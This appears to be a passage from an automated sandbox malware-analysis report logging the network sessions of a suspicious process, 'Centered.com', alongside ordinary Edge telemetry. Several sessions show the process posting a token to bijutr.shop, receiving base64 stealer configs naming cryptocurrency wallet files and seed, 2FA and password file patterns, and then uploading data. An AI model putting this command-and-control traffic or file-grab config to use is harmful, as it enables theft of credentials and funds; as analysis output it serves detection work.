                                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: JFK52-P3
                                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: Lt2lE6RBqE4CMMLICN8dDJZ8JsFLLs1OM_6Ccjg4TDNVYSIjOO_3dQ==


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      36192.168.2.749911188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:42 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----0Z58G4WLNYCJE3OHVAS0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:42 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 30 5a 35 38 47 34 57 4c 4e 59 43 4a 45 33 4f 48 56 41 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 35 38 47 34 57 4c 4e 59 43 4a 45 33 4f 48 56 41 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 35 38 47 34 57 4c 4e 59 43 4a 45 33 4f 48 56 41 53 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------0Z58G4WLNYCJE3OHVAS0Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------0Z58G4WLNYCJE3OHVAS0Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------0Z58G4WLNYCJE3OHVAS0Cont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:43 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:43 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                      Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      37192.168.2.74990351.104.15.2534432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:42 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735286739101&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 3868
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: _C_ETH=1; USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:42 UTC3868OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 38 3a 30 35 3a 33 39 2e 30 39 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 31 38 38 30 30 33 66 2d 32 39 36 30 2d 34 62 64 31 2d 61 38 32 65 2d 34 30 66 36 63 38 31 62 61 39 63 36 22 2c 22 65 70 6f 63 68 22 3a 22 33 34 32 32 36 38 30 30 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-27T08:05:39.095Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"8188003f-2960-4bd1-a82e-40f6c81ba9c6","epoch":"342268007"},"app":{"locale"
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:43 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=4070a74da02c46bc85760b3f675148fa&HASH=4070&LV=202412&V=4&LU=1735279842698; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:42 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=a22c87c247db4f8eb81c9717e7098304; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:42 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      time-delta-millis: -6896403
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:42 GMT
                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      38192.168.2.74991220.110.205.1194432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:43 UTC1261OUTGET /c.gif?rnd=1735286739103&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=00d263f4b17344089ebf5bec809664e2&activityId=00d263f4b17344089ebf5bec809664e2&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=CA9C2839891B4BAE9B46E9232B945869&MUID=309DCA2A26BF68F127E0DF4827176945 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: c.msn.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:43 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                      P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                      Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                      Set-Cookie: MUID=309DCA2A26BF68F127E0DF4827176945; domain=.msn.com; expires=Wed, 21-Jan-2026 06:10:43 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                      Set-Cookie: SRM_M=309DCA2A26BF68F127E0DF4827176945; domain=c.msn.com; expires=Wed, 21-Jan-2026 06:10:43 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                      Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 03-Jan-2025 06:10:43 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                      Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 27-Dec-2024 06:20:43 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:42 GMT
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Content-Length: 42
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:43 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      39192.168.2.749919188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:44 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----J589000R1N7YUAS0ZU37
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:44 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 35 38 39 30 30 30 52 31 4e 37 59 55 41 53 30 5a 55 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 38 39 30 30 30 52 31 4e 37 59 55 41 53 30 5a 55 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 38 39 30 30 30 52 31 4e 37 59 55 41 53 30 5a 55 33 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------J589000R1N7YUAS0ZU37Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------J589000R1N7YUAS0ZU37Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------J589000R1N7YUAS0ZU37Cont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:45 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:45 UTC2208INData Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                                      Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      40192.168.2.749927188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:47 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JMOPHL6P8YM7YMOHD2NG
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 7013
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:47 UTC7013OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4d 4f 50 48 4c 36 50 38 59 4d 37 59 4d 4f 48 44 32 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4d 4f 50 48 4c 36 50 38 59 4d 37 59 4d 4f 48 44 32 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 4d 4f 50 48 4c 36 50 38 59 4d 37 59 4d 4f 48 44 32 4e 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------JMOPHL6P8YM7YMOHD2NGContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------JMOPHL6P8YM7YMOHD2NGContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------JMOPHL6P8YM7YMOHD2NGCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:48 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      41192.168.2.74992551.104.15.2534432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:47 UTC1071OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735286744806&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 11929
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:47 UTC11929OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 38 3a 30 35 3a 34 34 2e 38 30 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 31 38 38 30 30 33 66 2d 32 39 36 30 2d 34 62 64 31 2d 61 38 32 65 2d 34 30 66 36 63 38 31 62 61 39 63 36 22 2c 22 65 70 6f 63 68 22 3a 22 33 34 32 32 36 38 30 30 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T08:05:44.805Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"8188003f-2960-4bd1-a82e-40f6c81ba9c6","epoch":"342268007"},"app":{"locale"
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:48 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=de4b02ba1292490bad62bc53cdc801aa&HASH=de4b&LV=202412&V=4&LU=1735279848147; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=0ca64fff9db744e8b78d7733632d30c0; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      time-delta-millis: -6896659
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:47 GMT
                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      42192.168.2.74992651.104.15.2534432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:47 UTC1070OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735286744810&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 5219
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
